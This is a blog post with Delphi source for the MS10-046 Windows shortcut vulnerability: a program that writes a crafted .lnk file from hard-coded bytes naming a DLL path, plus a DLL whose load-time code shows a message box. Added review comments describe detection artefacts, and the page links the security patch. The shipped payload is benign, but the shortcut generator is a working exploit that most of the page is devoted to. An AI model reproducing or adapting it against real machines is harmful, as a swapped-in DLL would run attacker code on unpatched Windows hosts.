[MS10-046] Cpl Lnk Exploit - Lnk Vulnerability by Paray_Vx

posted 9 Dec 2010, 15:16 by Delphi Basics
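This code demonstrates the MS10-046 'CPL Lnk Exploit' in Delphi. It consists of two listings: a program that writes a crafted shortcut (.lnk) file, and a library that is compiled to the DLL the shortcut refers to.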

Cpl Lnk Vulnerability - MS10-046 in Delphi
Author: - Paray_Vx -
Tested and working on Windows XP, Windows Vista and Windows 7

program MS10046;
uses
  SysUtils,
  Windows;

// Writes a fixed 141-byte shell-link (.lnk) image, followed by a 28-byte
// DLL path, to the file named by `location`. The file is created (or
// truncated if it already exists) and written one byte at a time.
//
// Reviewer notes (defensive reading):
//  - Despite its name, the ShellCode array is not machine code. It is
//    file-format data: it opens with the shell-link header size ($4C) and the
//    shell-link class ID, then an item ID list. The code that eventually runs
//    is whatever DLL the embedded path names.
//  - The item ID list contains the shell-namespace class IDs for My Computer
//    and Control Panel, which is where the "CPL" in the title comes from. A
//    shortcut whose target is a Control Panel item pointing at a DLL in an
//    unusual location is the pattern to look for when triaging .lnk files.
//  - On systems with the MS10-046 update installed the shortcut is inert;
//    the page itself points readers to the patch.
//
// Parameters:
//   location - path of the .lnk file to create.
procedure CplLnkExploit(location:string);
const
  // Prebuilt .lnk header and item ID list (file-format data, see notes above).
  // Sizelnk must be kept equal to the array's upper bound by hand.
  Sizelnk :integer = 141;
  ShellCode  : ARRAY [1..141] OF Byte = (
$4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01,
$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00,
$00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);

// Path of the DLL the shortcut refers to, stored as 16-bit characters.
// The bytes below spell the author's example path 'C:\MS10046.dll'.
// NOTE(review): the array begins with a $00 byte, so its two-byte units
// straddle the boundary with the last byte of ShellCode - keep that in mind
// when comparing the written file against a parser's view of it.
  SizeNameDll : integer = 28;
  Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);

var
 one : file;   // untyped file handle for the output .lnk
 i : integer;  // byte index into the arrays above

begin
 AssignFile(one,location);
 // Record size 1, so each BlockWrite below transfers exactly one byte.
 Rewrite(one,1);

  // Emit the fixed header / item ID list image.
  for i:=1 to Sizelnk do
  begin
   BlockWrite(one,ShellCode[i],1);
  end;

  // Append the DLL path bytes directly after it.
  for i:=1 to SizeNameDll do
  begin
   BlockWrite(one,Dllx[i],1);
  end;

  // NOTE(review): there is no try/finally around the writes; if Rewrite or
  // BlockWrite raises an I/O error, this CloseFile is not reached.
  CloseFile(one);
end;

// Program entry point: shows a message box, then writes the crafted shortcut
// to the fixed path C:\MS10-046.lnk.
// NOTE(review): the "Built!" message is displayed before CplLnkExploit runs,
// so it does not confirm that the file was actually written.
// The fixed output path is a useful artefact to search for when checking
// whether this sample was run on a host.
begin
     MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK);
     // Extract here
     CplLnkExploit('C:\MS10-046.lnk');
end.

// Second listing: the DLL that the crafted shortcut refers to.
// Its only content is the library initialization block below, which runs when
// the DLL is loaded into a process and shows a warning message box. The box
// serves as a harmless marker that the library was loaded; this listing has
// no other payload.
Library MS10046;

uses
  Windows;

// Library initialization: executed on load.
begin
     MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.

Many PCs remain unpatched and vulnerable to this exploit. To protect yourself, install the MS10-046 security update for your version of Windows:

Read more about the CPL Lnk vulnerability (MS10-046) here: